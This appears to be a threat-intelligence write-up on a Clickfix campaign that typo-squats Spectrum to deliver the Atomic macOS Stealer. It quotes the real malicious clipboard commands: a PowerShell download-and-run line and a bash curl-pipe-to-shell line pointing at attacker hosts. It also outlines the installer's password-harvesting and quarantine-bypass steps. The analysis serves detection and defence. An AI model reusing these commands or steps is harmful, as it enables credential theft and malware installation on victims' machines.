Executive Summary
A new Atomic macOS Stealer (AMOS) variant campaign has been uncovered, leveraging typo-squatted domains mimicking Spectrum, a U.S.-based telecom provider. The campaign employs the Clickfix method and delivers different payloads based on the victim's operating system. Notably, macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation. The script uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries. Russian-language comments in the source code suggest involvement of Russian-speaking cybercriminals. Poorly implemented logic in the delivery sites, such as mismatched instructions across platforms, points to hastily assembled infrastructure. This campaign highlights an increasing trend in multi-platform social engineering attacks targeting both consumer and corporate users.
Analysis
During the routine attacker infrastructure discovery and attribution cycle, we discovered a number of Clickfix themed delivery websites found to be typoquatting Spectrum, a US based company providing services for cable television, internet access, internet security, managed services, mobile phone, and unified communications.


When the victim clicks on “Alternative Verification”, a command is copied to the clipboard, and instructions are displayed for the victim to follow. Just like any other Clickfix campaign.

However, upon investigating further, we discovered that the website returned different responses based on varying user-agents.
Clipboard - Non macOS useragent
powershell -NoProfile -ExecutionPolicy Bypass -Command "$file = [System.IO.Path]::Combine($env:TEMP, 'api.ps1'); Invoke-WebRequest -Uri 'https://cf-verifi[.]pages[.]dev/i.txt' -OutFile $file; & $file" # ㅤCloudflareㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ
This is one of the most commonly used delivery methods for Windows users.
Clipboard - macOS useragent
/bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)" # MacOS Verification #248187 authenticated by Cloudflare. Copyright Cloudflare 2025.
/bin/bash -c "...": This tells the system to run the command inside the quotes using the Bash shell.
curl -fsSL <URL>:
- -f: Fail silently on HTTP errors.
- -s: Silent mode (no progress output).
- -S: Show error if -s is used and the request fails.
- -L: Follow redirects.
- It downloads the contents of the script hosted at https://applemacios[.]com/getrur/install.sh.
The output of curl (i.e., the install.sh script) is executed immediately by Bash.
Contents of install.sh

Password Harvesting:
- Gets Current User: username=$(whoami)
- Password Prompt Loop: Continuously prompts "System Password:" until correct password entered
- Password Validation: Uses dscl . -authonly to verify the password against macOS directory services
- Password Storage: Saves the valid password to /tmp/.pass file
Download & Execution:
- Downloads Payload: curl -o /tmp/update https://applemacios[.]com/getrur/update
- Removes Quarantine: Uses stolen password with sudo -S xattr -c to bypass macOS security
- Makes Executable: chmod +x /tmp/update
- Executes Malware: Runs the downloaded file /tmp/update
Upon analyzing the file saved as “update” within the “tmp” directory, we discovered that the malware belongs to the Atomic macOS stealer (AMOS) family. AMOS variants such as Poseidon and Odyssey has been seen in the wild lately, gaining traction among cybercriminals.
Attribution

While inspecting the source code of the delivery page, we came across a couple of comments in Russian, indicating that the malware is likely being spread by Russian speaking cybercriminals. Using these comments as a pivot point, along with other HTTP parameters, we were able to find IOFAs in addition to the IOCs.
The delivery pages in question for this AMOS variant campaign contained inaccuracies in both its programming and front-end logic. For Linux user agents, a PowerShell command was copied. Furthermore, the instruction "Press & hold the Windows Key + R" was displayed to both Windows and Mac users.
IOCs & IOFAs
Impact
- Corporate Credential Compromise: By harvesting macOS user passwords, attackers can gain access to corporate systems, VPNs, and internal resources, potentially enabling lateral movement.
- Bypass of Endpoint Security Controls: The malware uses legitimate utilities (dscl, sudo, xattr) to bypass macOS security mechanisms, reducing the chance of detection by traditional antivirus or EDR solutions.
- Initial Access for Broader Intrusions: Stolen credentials and persistent access may be sold to access brokers or used for follow-on attacks such as ransomware or data exfiltration.
Mitigations
- User Awareness Training: Educate employees and users about password-stealing tactics, especially those disguised as system verification prompts.
- macOS Endpoint Hardening: Enforce system integrity protections and restrict execution of unsigned scripts using tools like Gatekeeper and MDM policies.
- Threat Hunting for AMOS Activity: Monitor logs and endpoints for signs of password prompt abuse, unusual sudo activity, and known AMOS indicators.
References